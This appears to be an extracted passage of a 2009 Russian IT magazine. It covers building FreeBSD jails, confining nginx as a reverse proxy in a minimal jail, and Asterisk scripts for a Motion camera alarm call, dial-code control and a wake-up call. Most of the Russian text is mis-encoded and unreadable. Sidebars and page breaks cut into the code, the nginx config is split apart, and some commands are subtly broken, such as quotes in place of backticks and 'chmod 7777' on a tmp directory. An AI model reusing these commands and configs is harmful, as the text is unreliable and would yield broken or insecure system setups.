È âûïîëíÿåì ïîñëåäîâàòåëüíîñòü äåéñòâèé: 

1. Ñîçäàåì ïóñòîé ôàéë fstab (touch /etc/fstab), ÷òîáû ñêðèïòû 

èíèöèàëèçàöèè íå ðóãàëèñü íà åãî îòñóòñòâèå. 

2. Óñòàíàâëèâàåì ïàðîëü äëÿ ñóïåðïîëüçîâàòåëÿ (passwd 

root) è ñîçäàåì, ïî íåîáõîäèìñòè, äîïîëíèòåëüíûõ ïîëüçîâàòåëåé. 

3. Ïåðåñòðàèâàåì áàçó ïî÷òîâûõ ïñåâäîíèìîâ (newaliases), 

åñëè õîòèì èñïîëüçîâàòü sendmail. 

4. Íàñòðàèâàåì âðåìåííóþ çîíó (tzsetup). 

5. Ðåäàêòèðóåì /etc/resolv.conf òàêèì îáðàçîì, ÷òîáû ñåðâèñû, 

çàïóùåííûå âíóòðè jail’à, ìîãëè âûïîëíÿòü DNS-ðåçîëâèíã. 

Ìîæíî óêàçàòü àäðåñ õîñò-ñèñòåìû, åñëè â íåé çàïóùåí 

êýøèðóþùèé DNS-ñåðâåð. 

6. Äîáàâëÿåì â /etc/rc.conf ñëåäóþùèå ñòðîêè: 

# vi /etc/rc.conf 

// Ñåòåâîå èìÿ jail-îêðóæåíèÿ 

hostname="base.jail" 

// Îòêëþ÷àåì êîíôèãóðèðîâàíèå ñåòåâûõ èíòåðôåéñîâ 

(îíè âèðòóàëüíûå) 

network_interfaces="" 

// Âêëþ÷àåì/îòêëþ÷àåì íåîáõîäèìûå ñåðâèñû 

# PREFIX=/usr/jail/base portinstall -P ïàêåò 

Ê ñîæàëåíèþ, â íåêîòîðûõ ñëó÷àÿõ ïðÿìîå óêàçàíèå ïóòè 

óñòàíîâêè íå ïîäõîäèò. Íàïðèìåð, òû ìîæåøü ïîäíÿòü ìíîæåñòâî 

jail-ñåðâåðîâ íà áûñòðîé ìàøèíå è ïðåäëàãàòü ëþäÿì 

óñëóãè ïî ïðåäîñòàâëåíèþ â àðåíäó âûäåëåííîãî ñåðâåðà 

FreeBSD, ñ êîòîðûì îíè ñìîãóò äåëàòü âñå, ÷òî çàõîòÿò. È åñëè 

òû íå ïîçâîëèøü êëèåíòàì ñàìîñòîÿòåëüíî óñòàíàâëèâàòü 

ñòîðîííåå ÏÎ ÷åðåç ïîðòû, èõ ïîòîê âñêîðå èññÿêíåò. Ïðîñòîé 

ñïîñîá èçáåæàòü ýòîãî — ñêîïèðîâàòü ïîðòû èç áàçîâîé 

ñèñòåìû â êàæäîå èç jail-îêðóæåíèé. Íî ýòî î÷åíü ãðóáûé 

ïîäõîä, ðàñõîäóþùèé äèñêîâîå ïðîñòðàíñòâî è îòíèìàþùèé 

âðåìÿ íà ñèíõðîíèçàöèþ ñ íîâûì äåðåâîì ïîðòîâ. Ãîðàçäî 

ïðîùå è ðàçóìíåå ïðèìåíèòü âèðòóàëüíûå ôàéëîâûå 

ñèñòåìû âðîäå unionfs è nullfs äëÿ ìîíòèðîâàíèÿ êàòàëîãà / 

usr/ports êî âñåì òþðüìàì: 

èëè 

# mount_unionfs /usr/ports /usr/jail/base/usr/ports 

# mount_nullfs /usr/ports /usr/jail/base/usr/ports 

ШАГ 4. ЗАПУСК JAIL-ОКРУЖЕНИЯ 

Âñå ïîäãîòîâèòåëüíûå ðàáîòû âûïîëíåíû, îñòàëîñü òîëüêî 

XÀÊÅÐ 04 /124/ 09

SYN/ACK 

Man jail: отличное руководство по управлению jailокружениями 

Сервисы, помещенные в jail, могут общаться с корневой 

системой через loopback-интерфейс 

çàïóñòèòü ãîòîâûé âèðòóàëüíûé jail-ñåðâåð. Äëÿ ýòîãî äîáàâëÿåì â /etc/ 

rc.conf ñëåäóþùèå ñòðîêè: 


jail_enable="YES" 

// Ñïèñîê jail-îêðóæåíèé 

jail_list="base»" 

// Ñòàíäàðòíûå îïöèè jail 

jail_base_rootdir="/usr/jail/base" 

jail_base_hostname="base.jail" 

jail_base_ip="192.168.0.1" 

jail_base_interface="de0" 

// Êîìàíäû çàïóñêà è îñòàíîâêè 

jail_base_exec_start="/bin/sh /etc/rc" 

jail_base_exec_stop="/bin/sh /etc/rc.shutdown" 

// Êàêèå ÔÑ ìîíòèðîâàòü? 

jail_base_devfs_enable="YES" 

jail_base_fdescfs_enable="NO" 

jail_base_procfs_enable="NO" 

è çàïóñêàåì: 

# /etc/rc.d/jail start base 

Ñïèñîê çàïóùåííûõ jail-îêðóæåíèé âñåãäà äîñòóïåí ïî êîìàíäå /usr/ 

sbin/jls. Ïðîöåññû, çàêëþ÷åííûå â òþðüìó, îòîáðàæàþòñÿ â âûâîäàõ ps è 

top. Èõ îòëè÷èòåëüíàÿ ÷åðòà — ôëàã ‘J’. 

КАК ЭТО ДЕЛАЮТ ДЖЕДАИ 

Âûøå áûë îïèñàí «îôèöèàëüíûé» ñïîñîá ñîçäàíèÿ jail-îêðóæåíèé, ïîäõîäÿùèé 

ïî÷òè äëÿ âñåõ ñëó÷àåâ. Åãî äîñòîèíñòâà â óíèâåðñàëüíîñòè è 

îòíîñèòåëüíîé ïðîñòîòå ðàçâåðòûâàíèÿ âèðòóàëüíîãî ñåðâåðà. Ñ äðóãîé 

ñòîðîíû, äëÿ åäèíè÷íîãî ñåðâèñà, ïîìåùåííîãî â òþðüìó, ïîëíîå 

îêðóæåíèå èñïîëíåíèÿ — ÿâíîå èçëèøåñòâî, ñúåäàþùåå ñâîáîäíîå 

ïðîñòðàíñòâî è íåñóùåå óãðîçó áåçîïàñíîñòè. Âçëîìùèê, ïðîíèêøèé 

â òþðüìó, ïîëó÷èò â ðàñïîðÿæåíèå öåëüíóþ îïåðàöèîííóþ ñèñòåìó ñ 

êîìàíäíûì èíòåðïðåòàòîðîì, êîìïèëÿòîðîì, ssh-ñåðâåðîì è ìàññîé 

äðóãèõ ïîäñîáíûõ óòèëèò. Ñòîèò ëè ãîâîðèòü, ÷åì ãðîçèò òàêàÿ ñâîáîäà 

âûáîðà? 

Ãëàâíîå ïðàâèëî, êîòîðûì ñëåäóåò ðóêîâîäñòâîâàòüñÿ ïðè ñîçäàíèè 

ðàçíîãî ðîäà ïåñî÷íèö, òþðåì è âèðòóàëüíûõ ñåðâåðîâ — «÷åì ïðîùå, 

òåì ëó÷øå». Ïî âîçìîæíîñòè èç îêðóæåíèÿ ñëåäóåò óáðàòü âñå, 

÷òî íå âëèÿåò íà ðàáîòó ñåðâèñà, âêëþ÷àÿ áèáëèîòåêè, êîíôèãóðàöèîííûå 

ôàéëû è, â îñîáåííîñòè, ðàçëè÷íûå ïîäñîáíûå óòèëèòû è 

êîíñîëüíûå êîìàíäû âðîäå ls, cd è sh. Îòäåëüíîìó ñåðâèñó íå íóæíà 

XÀÊÅÐ 04 /124/ 09 

øâåéöàðñêàÿ òþðüìà ñ óäîáñòâàìè, åìó áîëüøå ïîäîéäåò ðóññêàÿ 

çîíà. Äëÿ èëëþñòðàöèè òîãî, êàê âñå ýòî ïðîäåëàòü â ðåàëüíûõ óñëîâèÿõ, 

ðàññìîòðèì ïðîöåññ ïîìåùåíèÿ nginx, ðàáîòàþùåãî â ðåæèìå 

reverse-proxy, âíóòðü jail. Ïðåäñòàâèì, ÷òî ó íàñ åñòü apache, ðàáîòàþùèé 

â êîðíåâîé ñèñòåìå è ñëóøàþùèé ïîðò 8080. Çàäà÷à: ïîìåñòèòü 

ïåðåä íèì nginx, ñëóøàþùèé 80-é ïîðò è ïåðåíàïðàâëÿþùèé çàïðîñû 

ê apache. ×òîáû îáåçîïàñèòü apache, ìû ðåøàåì ïîìåñòèòü nginx â 

jail. Êàê ýòî ñäåëàòü? Äëÿ íà÷àëà ñîçäàäèì äëÿ íàøåé òþðüìû êàòàëîã 

è óñòàíîâèì òóäà nginx (çäåñü è äàëåå ïðèâåäåíû êîìàíäû äëÿ bash): 

# JAIL=/usr/jail/nginx 

# mkdir -p $JAIL 

# cd /usr/ports/www/nginx 

# make PREFIX=$JAIL install clean 

Âûÿñíèì, êàêèå áèáëèîòåêè íóæíû nginx äëÿ ðàáîòû: 

# ldd $JAIL/sbin/nginx 

È ñêîïèðóåì èõ â êàòàëîã /usr/jail/nginx/lib: 

# mkdir -p $JAIL/lib 

# LIBS='ldd $JAIL/sbin/nginx|grep -v ':$'|cut -f 3 -d " "' 

# for LIB in $LIBS; do cp $LIB $JAIL/lib; done 

Êðîìå òîãî, íåîáõîäèìî ñêîïèðîâàòü è íàñòðîèòü ëèíêîâùèê ld-elf.so.1, 

áåç íåãî íå çàïóñòèòñÿ íè îäèí èñïîëíÿåìûé ôàéë: 

# mkdir -p $JAIL/libexec 

# cp /libexec/ld-elf.so.1 $JAIL/libexec 

# mkdir -p $JAIL/var/run 

# ldconfig -s -f $JAIL/var/run/ld-elf.so.hints $JAIL/lib 

Çàâåäåì ïîëüçîâàòåëÿ è ãðóïïó www: 

# echo 'www:*:80:80::0:0:World Wide Web Owner:/ 

nonexistent:/usr/sbin/nologin' > $JAIL/etc/passwd 

# cp $JAIL/etc/{passwd,master.passwd} 

# pwd_mkdb -d $JAIL/etc $JAIL/etc/master.passwd 

# echo 'www:*:80:' > $JAIL/etc/group 

Ñîçäàäèì êàòàëîãè, íåîáõîäèìûå äëÿ íîðìàëüíîé ðàáîòû ñåðâèñà: 

# mkdir -p $JAIL/var/{log,tmp/nginx} 

# chown 80:80 $JAIL/var/tmp/nginx 

113

ХАКЕР.PRO 

SYN/ACK 

Ïàðà ñëîâ îá nginx 

Nginx (engine x) — âûñîêîïðîèçâîäèòåëüíûé è íåòðåáîâàòåëüíûé 

ê ðåñóðñàì HTTP-ñåðâåð è ïî÷òîâûé ïðîêñè. Îáû÷íî èñïîëüçóåòñÿ 

â êà÷åñòâå HTTP-àêñåëåðàòîðà, ïåðåäàþùåãî âñå çàïðîñû 

ê apache, èëè ëåãêîâåñíîãî ñåðâåðà äëÿ îòäà÷è ñòàòè÷åñêîãî 

êîíòåíòà. Ïðèìåíÿåòñÿ íà wordpress.com è áîëüøèíñòâå ñåðâåðîâ 

Ðàìáëåðà. Ðàçðàáàòûâàåòñÿ Èãîðåì Ñûñîåâûì ñ 2002-ãî ãîäà. 

# mkdir $JAIL/{dev,tmp} 

# chmod 7777 $JAIL/tmp 

Ñìîíòèðóåì ôàéëîâóþ ñèñòåìó devfs: 

# mount -t devfs devfs $JAIL/dev 

Ñîçäàäèì IP-ïñåâäîíèì è íàñòðîèì áðàíäìàóýð íà ðåäèðåêò HTTP-òðàôèêà 

íà IP-àäðåñ òþðüìû: 

# ifconfig ed0 inet alias 192.168.0.1/16 

# ipfw add fwd 192.168.0.1,80 tcp from any to âíåøíèé-ip 80 

Îòêðîåì êîíôèãóðàöèîííûé ôàéë nginx è ïðèâåäåì ñåêöèþ server ê ñëåäóþùåìó 

âèäó: 

# vi /usr/jail/nginx/etc/nginx/nginx.conf 

server { 

listen 80; 

server_name www.host.ru; 

location / { 

proxy_pass http://127.0.0.1:8080/; 

proxy_redirect off; 

proxy_set_header Host $host; 

proxy_set_header X-Real-IP $remote_addr; 

proxy_set_header X-Forwarded-For $proxy_add_x_ 

forwarded_for; 

client_max_body_size 10m; 

client_body_buffer_size 128k; 

Ïåðåìåííûå sysctl, 

î êîòîðûõ íóæíî 

çíàòü 

1 security.jail.set_hostname_allowed — ìîæåò ëè jail-ñóïåðïîëüçîâàòåëü 

èçìåíÿòü ñåòåâîå èìÿ (hostname) jail-ñåðâåðà. Èìååò 

ñìûñë îòêëþ÷èòü, åñëè äëÿ òþðüìû âûäåëåíî íàñòîÿùåå ñåòåâîå 

èìÿ, ïðîïèñàííîå â DNS-çîíàõ. 2 security.jail.allow_raw_sockets — 

ðàçðåøèòü jail-ñóïåðïîëüçîâàòåëþ ñîçäàâàòü raw-ñîêåòû. Â öåëÿõ 

áåçîïàñíîñòè îïöèÿ îòêëþ÷åíà, íî îíà ìåøàåò ïðàâèëüíîé ðàáîòå 

íåêîòîðûõ èíñòðóìåíòîâ, ïðåäíàçíà÷åííûõ äëÿ îòëàäêè ñåòè. 

3 security.jail.chflags_allowed — ïîçâîëèòü jail-ïðîöåññàì ìîäèôèöèðîâàòü 

ôëàãè ÔÑ (chflags). Ïî óìîë÷àíèþ âûêëþ÷åíà, ÷òî 

îòêðûâàåò èíòåðåñíûå âîçìîæíîñòè äëÿ ïîìåùåíèÿ â jail íåóäàëÿåìûõ, 

íå÷èòàåìûõ èëè íåçàïèñûâàåìûõ ôàéëîâ. 

×òîáû nginx ñòàðòîâàë ïðè çàãðóçêå, äîáàâèì â /etc/rc.conf ñëåäóþùå 

çàïèñè: 


ifconfig_ed0_alias0="inet 192.168.0.1" 

jail_enable="YES" 

jail_list="nginx" 

jail_nginx_rootdir="/usr/jail/nginx" 

jail_nginx_hostname="nginx.jail" 

jail_nginx_ip="192.168.0.1" 

// Ïîëíàÿ èíèöèàëèçàöèÿ îêðóæåíèÿ íå íóæíà, äîñòàòî÷íî 

ñðàçó çàïóñòèòü ñåðâèñ 

jail_nginx_exec_start="/sbin/nginx -c /etc/nginx/nginx. 

conf" 

// Îñòàíàâëèâàòü nginx âðó÷íóþ òàêæå íå òðåáóåòñÿ, ïåðåä 

çàâåðøåíèåì ðàáîòû jail àêêóðàòíî óáüåò âñå ñâîè ïðîöåññû 

ñ ïîìîùüþ kill 

jail_nginx_exec_stop="" 

// Íàì ïîíàäîáèòñÿ òîëüêî devfs 

jail_nginx_devfs_enable="YES" 

jail_nginx_fdescfs_enable="NO" 

jail_nginx_procfs_enable="NO" 

} 

} 

114 

proxy_connect_timeout 90; 

proxy_send_timeout 90; 

proxy_read_timeout 90; 

proxy_buffer_size 4k; 

proxy_buffers 4 32k; 

proxy_busy_buffers_size 64k; 

proxy_temp_file_write_size 64k; 

Ó÷òè, ÷òî õèòðàÿ ñèñòåìà ïîðòîâ èçìåíèëà äåôîëòîâûå ïóòè ïîèñêà ôàéëîâ â 

nginx, äîáàâèâ ê íèì ïðåôèêñ /usr/jail/nginx. Ïîýòîìó âñå îòíîñèòåëüíûå ïóòè 

â ôàéëå êîíôèãóðàöèè ïðèäåòñÿ çàìåíèòü íà àáñîëþòíûå, òî åñòü — ïðîïèñàòü 

âìåñòî «include mime.types;» ñòðîêó «include /etc/nginx/mime.types;». Âñå, 

òåïåðü âèðòóàëüíûé ñåðâåð ñ nginx ìîæíî çàïóñòèòü (îïöèÿ ‘-c’ ïîçâîëÿåò ïåðåïèñàòü 

íåâåðíûé äåôîëòîâûé ïóòü ïîèñêà êîíôèãóðàöèîííîãî ôàéëà): 

# jail /usr/jail/nginx nginx.jail 192.168.0.1 /sbin/nginx 

-c /etc/nginx/nginx.conf 

Ïî îïèñàííîé ñõåìå â òþðüìó ìîæíî ïîñàäèòü ïðàêòè÷åñêè ëþáîé ñåðâèñ, 

íå îòÿãîùåííûé ìíîæåñòâîì çàâèñèìîñòåé. Â íåêîòîðûõ ñëó÷àÿõ 

ïðèäåòñÿ ïîâîçèòüñÿ ñ ñîçäàíèåì ôàéëîâ è êàòàëîãîâ, à òàêæå ñ îòñëåæèâàíèåì 

íåîáõîäèìûõ áèáëèîòåê (íåêîòîðûå ñåòåâûå ñåðâåðû, íàïðèìåð 

sshd, çàãðóæàþò áèáëèîòåêè âî âðåìÿ èñïîëíåíèÿ, òàê ÷òî ldd ïîêàæåò íå 

âñå, è ïðèäåòñÿ âîñïîëüçîâàòüñÿ lsof). Ïðîáëåìó òàêæå ïðåäñòàâëÿåò /dev. 

Âåñüìà îïðîìåò÷èâî îòêðûâàòü âñå ôàéëû ýòîãî êàòàëîãà íà ÷òåíèå, à óæ 

òåì áîëåå, íà çàïèñü, — ïîýòîìó äëÿ ðåãóëèðîâàíèÿ ïðàâ äîñòóïà íåîáõîäèìî 

èñïîëüçîâàòü ñïåöèàëüíûå íàñòðîéêè devfs. Ôàéë /etc/defaults/ 

devfs.rules ñîäåðæèò áàçîâûå ïðàâèëà devfs äëÿ jail. Ïî óìîë÷àíèþ îí îòêðûâàåò 

äîñòóï ê ïîäñîáíûì ñèíòåòè÷åñêèì ôàéëàì, òàêèì êàê /dev/ 

null è /dev/random, à òàêæå ïñåâäîòåðìèíàëàì. Äëÿ áîëüøèíñòâà êîíôèãóðàöèé 

íàñòðîéêè äàæå íå ïðèäåòñÿ ðåäàêòèðîâàòü, äîñòàòî÷íî ñêîïèðîâàòü 

ôàéë â êàòàëîã /etc è äîáàâèòü â /etc/rc.conf ñëåäóþùóþ çàïèñü: 

jail_èìÿ_devfs_ruleset="devfsrules_jail" 

Åñëè æå ïîíàäîáÿòñÿ äîïîëíèòåëüíûå ôàéëû óñòðîéñòâ, òî devfs.rules 

ëåãêî îòðåäàêòèðîâàòü, äîáàâèâ íåîáõîäèìûå ïðàâèëà. Ñèíòàêñèñ ôàéëà 

è ïðàâèë îïèñàíû íà man-ñòðàíèöàõ devfs(8) è devfs.rules(5). z 

XÀÊÅÐ 04 /124/ 09

SYN/ACK 

SERGEY JAREMCHUK 

FEAT ANDREY MATVEEV 

Звездное 

попурри 

Фокусничаем с IP-PBX Asterisk 

Сервер телефонии Asterisk обладает поистине колоссальными возможностями 

обеспечения переговоров по IP-сетям, заменяя обычную 

офисную АТС при большей функциональности и меньшей цене. Но 

Asterisk — это еще и необычайно гибкая система, предоставляющая 

широкое поле для творчества. Немного фантазии, и можно реализовать 

практически любую функцию, не предусмотренную разработчиками. 

>> SYN/ACK 

СИСТЕМА ВИДЕОНАБЛЮДЕНИЯ С ОПОВЕЩЕНИЕМ Îäíà èç ÷àñòî 

âîñòðåáîâàííûõ âîçìîæíîñòåé Asterisk — ýòî çàïóñê ïðîãðàìì è ñêðèïòîâ 

èç ýêñòåíøåíà (ïðè íàáîðå îïðåäåëåííîãî íîìåðà) èëè âûçîâ àáîíåíòà 

èç äðóãîãî (âíåøíåãî) ïðèëîæåíèÿ. Äëÿ óäîáñòâà àäìèíà ðåàëèçîâàíî 

íåñêîëüêî ïóòåé, ïîçâîëÿþùèõ èíèöèèðîâàòü èñõîäÿùèé çâîíîê 

íà ëåòó: 

1. Call-ôàéë — îáû÷íûé òåêñòîâûé ôàéë, èìåþùèé îïðåäåëåííóþ ñòðóêòóðó. 

2. API — ïîäêëþ÷èâøèñü ê ïîðòó óïðàâëåíèÿ (ïî óìîë÷àíèþ 5038) ïðè 

ïîìîùè telnet, ìîæíî çàäàòü âñå íåîáõîäèìûå êîìàíäû. 

3. CLI (command line interface) êîìàíäà — óïðàâëåíèå ñåðâåðîì â êîíñîëè 

(âûçûâàåòñÿ ïðè ïîìîùè «asterisk -r»). 

4. Èñïîëüçîâàíèå íàñòðîåê ïåðåàäðåñàöèè íà äðóãîé íîìåð — FollowMe. 

Íàèáîëåå óäîáåí â ðàáîòå âàðèàíò ñ èñïîëüçîâàíèåì ôàéëà ñ ðàñøèðåíèåì 

.call. Äîñòàòî÷íî òàêîìó ôàéëó ïîÿâèòüñÿ â êàòàëîãå /var/spool/ 

asterisk/outgoing (íàñòðàèâàåòñÿ â asterisk.conf ïðè ïîìîùè astspooldir), 

êàê ñåðâåð âûïîëíèò çàäàííûå â íåì êîìàíäû. Call-ôàéë ìîæíî ñãåíåðèðîâàòü 

íàëåòó è çàòåì ïðîñòî ñêîïèðîâàòü â äàííûé êàòàëîã. Asterisk 

ïðîâåðÿåò âðåìÿ ñîçäàíèÿ ôàéëà; åñëè îíî «â áóäóùåì», òî êîìàíäà âûïîëíèòñÿ, 

êîãäà ñèñòåìíîå âðåìÿ è âðåìÿ ìîäèôèêàöèè ñîâïàäóò. Ýòî 

òàêæå ìîæíî èñïîëüçîâàòü äëÿ îòëîæåííîãî çàïóñêà êîìàíä â Call-ôàéëå. 

Åäèíñòâåííîå óñëîâèå — àêòèâàöèÿ ïàðàìåòðà «autoload=yes» (òàê 

ñäåëàíî ïî óìîë÷àíèþ) â modules.conf. Â ôàéëå èñïîëüçóþòñÿ èíñòðóêöèè 

èç extensions.conf, íî ó íåãî íåñêîëüêî äðóãàÿ ñòðóêòóðà è êîëè÷åñòâî 

âîçìîæíûõ êîìàíä â íåì îãðàíè÷åíî. ×òîáû áûëî ïîíÿòíåå, î ÷åì ðå÷ü, 

ðàññìîòðèì ñîâìåñòíóþ ðàáîòó Asterisk è ñèñòåìû âèäåîíàáëþäåíèÿ 

Motion (www.lavrsen.dk/twiki/bin/view/Motion/WebHome), ñïîñîáíîé 

âûïîëíÿòü çàäàííóþ ïðîãðàììó èëè ñêðèïò ïðè îáíàðóæåíèè äâèæåíèÿ. 

Òàêîé òàíäåì ìîæåò ïîíàäîáèòüñÿ äëÿ êîíòðîëÿ íàä íåêîòîðûì îáúåêòîì, 

ñêàæåì, ñåðâåðîì. Ðîëü Asterisk çäåñü — ãëàâíàÿ: ñ åãî ïîìîùüþ ïðè 

âîçíèêíîâåíèè ñîáûòèÿ ìû áóäåì çâîíèòü àäìèíó íà SIP-òåëåôîí (ìîæíî 

íà ãîðîäñêîé èëè ñîòîâûé). Ïîëíîñòüþ óñòàíîâêó Motion è íàñòðîéêè 

â /etc/motion/motion.conf ðàññìàòðèâàòü íå áóäåì, çà ïîäðîáíîñòÿìè 

îáðàùàéñÿ ê ñòàòüå «Ñóìåðå÷íûé äîçîð», îïóáëèêîâàííîé â ìàðòîâñêîì 

íîìåðå z çà 2008 ãîä. Îñòàíîâèìñÿ òîëüêî íà ñàìûõ âàæíûõ ìîìåíòàõ: 

$ sudo nano /etc/motion/motion.conf 

# Âêëþ÷àåì âñòðîåííûé âåá-ñåðâåð, ðàçðåøàåì ê íåìó óäàëåííûé 

äîñòóï 

webcam_port 8000 

webcam_motion on 

webcam_localhost off 

webcam_quality 30 

webcam_maxrate 6 

control_authentication username:password 

# Ïðè îáíàðóæåíèè äâèæåíèÿ çàïóñêàåì ñêðèïò, êîòîðûé áóäåò 

ïîäíèìàòü òðåâîãó, âìåñòî äèðåêòèâû on_motion_detected 

ìîæíî èñïîëüçîâàòü on_event_start 

on_motion_detected /usr/bin/webcam_event.sh 

Ñìîòðèì îòëàäî÷íóþ èíôîðìàöèþ, çàïóñòèâ Motion ñ ôëàãîì '–n': 

$ motion –n 

Thread is from /etc/motion/motion.conf 

Åñëè âñå â ïîðÿäêå, ñòàðòóåì ïðîãðàììó â îáû÷íîì ðåæèìå è ïåðåõîäèì 

ê íàïèñàíèþ ñêðèïòà webcam_event.sh: 

$ sudo nano /usr/bin/webcam_event.sh 

#!/bin/sh 

cat /tmp/alarm.call 

# Óñòàíàâëèâàåì ïàðàìåòðû êàíàëà è CallerID 

XÀÊÅÐ 04 /124/ 09 

115

SYN/ACK 

Channel: SIP/admin 

Callerid: 11111111 

# Êîëè÷åñòâî ïîâòîðíûõ ïîïûòîê âûçîâà â ñëó÷àå íåóäà÷è, 

íå âêëþ÷àÿ ïåðâóþ (ò.å. â íàøåì ñëó÷àå ïðè âîçíèêíîâåíèè 

ïðîáëåì áóäåò ñäåëàíî 3 ïîïûòêè âûçîâà àáîíåíòà) 

MaxRetries: 2 

# Âðåìÿ äî ïîâòîðíîé ïîïûòêè íàáîðà (ïî óìîë÷àíèþ 300 ñåê) 

RetryTime: 30 

# Âðåìÿ îæèäàíèÿ îòâåòà (ïî óìîë÷àíèþ 45 ñåê) 

WaitTime: 30 

# Êîíòåêñò èç extensions.conf è ïðèîðèòåò âûçîâà 

Context: alarm 

Extension: s 

Priority: 1 

EOF 

# Çàäàåì íóæíûå ïðàâà äëÿ ñîçäàííîãî ôàéëà è ïåðåíîñèì åãî 

â íóæíóþ ïàïêó 

chown asterisk:asterisk /tmp/alarm.call 

mv /tmp/alarm.call /var/spool/asterisk/outgoing/ 

Âîò ïðàêòè÷åñêè è âñå ïàðàìåòðû, âîçìîæíûå â Call-ôàéëå. Îïöèîíàëüíî 

äëÿ óñòàíîâêè âðåìåíè ìîæíî èñïîëüçîâàòü timestamp: 

Set: timestamp=20091023104500 

Òåïåðü äîáàâëÿåì îïèñàíèå â extension.conf: 

$ sudo nano /etc/asterisk/extension.conf 

[alarm] 

116 

exten => s,1,Answer() 

exten => s,n,Wait(2) 

exten => s,n,Playback(activated) 

exten => s,n,Wait(1) 

exten => s,n,Hangup() 

Ïîñëå âíåñåíèÿ èçìåíåíèé íå çàáûâàåì ïåðå÷èòàòü ïëàí íàáîðà êîìàíäîé 

«dialplan reload». Òåïåðü, îáíàðóæèâ äâèæåíèå, Motion çàïóñòèò 

âûïîëíÿòüñÿ ñêðèïò webcam_event.sh, êîòîðûé ñîçäàñò /tmp/alarm.call 

è ñêîïèðóåò åãî â /var/spool/asterisk/outgoing. Ïîñëå ÷åãî Call-ôàéë áóäåò 

îáðàáîòàí Asterisk, è íà íîìåð admin, îïèñàííûé â sip.conf, ïîñòóïèò 

çâîíîê ñ CallerID «11111111». Íåìíîãî äîïèëèâ ýòîò ñêðèïò, ìîæíî çàñòàâèòü 

Asterisk âûïîëíÿòü è äðóãèå îïåðàöèè, íàïðèìåð, îòïðàâëÿòü e-mail 

èëè SMS. Êàê òû ïîíèìàåøü, âìåñòî Motion ïîäîéäåò ëþáàÿ äðóãàÿ ïðîãðàììà, 

óìåþùàÿ ñîçäàâàòü èëè êîïèðîâàòü ôàéëû ïðè âîçíèêíîâåíèè 

îïðåäåëåííîãî ñîáûòèÿ. 

УСЛОЖНЯЯ КОНФИГУРАЦИЮ, УПРОЩАЕМ УПРАВЛЕНИЕ Ðàññìîòðèì 

åùå îäíó âîçìîæíîñòü âûïîëíåíèÿ êîìàíä â Asterisk, à çàîäíî 

— íåìíîãî äîïîëíèì íàøó ñõåìó. Íàïðèìåð, â ðàáî÷åå âðåìÿ â èñïîëüçîâàíèè 

Motion îñîáîãî ñìûñëà íåò, ïîýòîìó åãî ìîæíî ñìåëî îòêëþ÷àòü. 

Ýòî ìîæíî ñäåëàòü èç êîíñîëè èëè ïðè ïîìîùè ïëàíèðîâùèêà cron, íî 

óäîáíåå äëÿ âêëþ÷åíèÿ/îòêëþ÷åíèÿ ïðîñòî ïîçâîíèòü ïî îïðåäåëåííîìó 

íîìåðó. Ñîçäàäèì íåáîëüøîé ñêðèïò, ïðè ïîìîùè êîòîðîãî áóäåì 

óïðàâëÿòü äåìîíîì Motion: 

$ sudo nano /usr/bin/motion.sh 

#!/bin/sh 

case $1 in 

XÀÊÅÐ 04 /124/ 09

SYN/ACK 

Редактируем extensions.conf 

start) 

/usr/bin/motion 

;; 

stop) 

PID='pidof motion' 

kill $PID 

killall webcam_event.sh 

rm -f /var/spool/asterisk/outgoing/ 

alarm.call 

;; 

esac 

Â extension.conf çàíîñèì îïèñàíèÿ íîìåðîâ, êîòîðûå áóäóò èñïîëüçîâàíû 

äëÿ çàïóñêà ñêðèïòà ñ ðàçíûìè ïàðàìåòðàìè: 

$ sudo nano /etc/asterisk/extension.conf 

exten => *001,1,Answer() 

exten => *001,n,Playback(activated) 

exten => *001,n,System(/usr/bin/motion.sh 

start) 

exten => *001,n,Hangup() 


exten => *002,n,System(/usr/bin/motion.sh 

stop) 

exten => *002,n,Playback(de-activated) 


Òåïåðü, ÷òîáû çàïóñòèòü Motion, äîñòàòî÷íî íàáðàòü íîìåð 

*001, à ÷òîáû îñòàíîâèòü — *002. 

БУДИЛЬНИК НА ASTERISK Ðåàëèçîâàòü áóäèëüíèê â *nix 

ìîæíî äàëåêî íå åäèíñòâåííûì ñïîñîáîì (ñàìûé ïðîñòîé, 

íàâåðíîå: «sleep 20m && mpg123 ~/bell.mp3»), íî õî÷åòñÿ 

÷åãî-òî êðàñèâîãî è íåñòàíäàðòíîãî. Ïîèñê â èíòåðíåòå ïî 

çàïðîñó «asterisk wakeup» âûäàñò íåñêîëüêî ðåøåíèé, íàïèñàííûõ 

ñ èñïîëüçîâàíèåì ðàçíûõ ÿçûêîâ ïðîãðàììèðîâàíèÿ 

è íåìíîãî îòëè÷àþùèõñÿ êàê ïðîöåññîì óñòàíîâêè, òàê 

è âîçìîæíîñòÿìè. Ñàìîå ïîïóëÿðíîå èç íèõ — PHP-ñêðèïò 

wakeup.php, àâòîðîì êîòîðîãî ñòàë Àíäè Âûñîöêè (www. 

voip-info.org/liberty/view/file/2388). Ñêà÷èâàåì ïî ññûëêå 

tar-àðõèâ, ðàñïàêîâûâàåì php-ôàéë â êàòàëîã ñ AGI-ñêðèïòàìè 

(Asterisk Gateway Interface — øëþçîâîé èíòåðôåéñ, ïîñðåäñòâîì 

êîòîðîãî âíåøíèå ïðîãðàììû ìîãóò óïðàâëÿòü 

äèàëïëàíîì Asterisk) è äåëàåì åãî èñïîëíÿåìûì: «chmod 

a+x /var/lib/asterisk/agi-bin/wakeup.php» (íóæíûé êàòàëîã 

ìîæíî óçíàòü, ïðîñìîòðåâ çíà÷åíèå ïåðåìåííîé astagidir â 

êîíôèãå asterisk.conf). 

Ñêðèïò wakeup.php ñîäåðæèò ðÿä ïåðåìåííûõ, êîòîðûå íåîáõîäèìî 

ïîäïðàâèòü ñ ó÷åòîì íàñòðîåê ñèñòåìû: 

XÀÊÅÐ 04 /124/ 09 

Видеокодеки, устанавливаемые в Asterisk 

; Ðàñïîëîæåíèå èíòåðïðåòàòîðà PHP â ðàçíûõ *nixñèñòåìàõ 

ìîæåò îòëè÷àòüñÿ 

#!/usr/bin/php -q 

; Æóðíàë èç /tmp ëó÷øå óáðàòü 

$parm_error_log = '/var/log/asterisk/wakeup.log'; 

; Ïî óìîë÷àíèþ ñêðèïò ñîçäàåò âðåìåííûå ôàéëû â / 

tmp, íî åñëè ýòîò êàòàëîã íàõîäèòñÿ íà îòäåëüíîì 

ðàçäåëå, òî wakeup.php îòêàæåòñÿ ðàáîòàòü, ïîýòîìó: 

$parm_temp_dir = '/var/spool/asterisk/tmp'; 

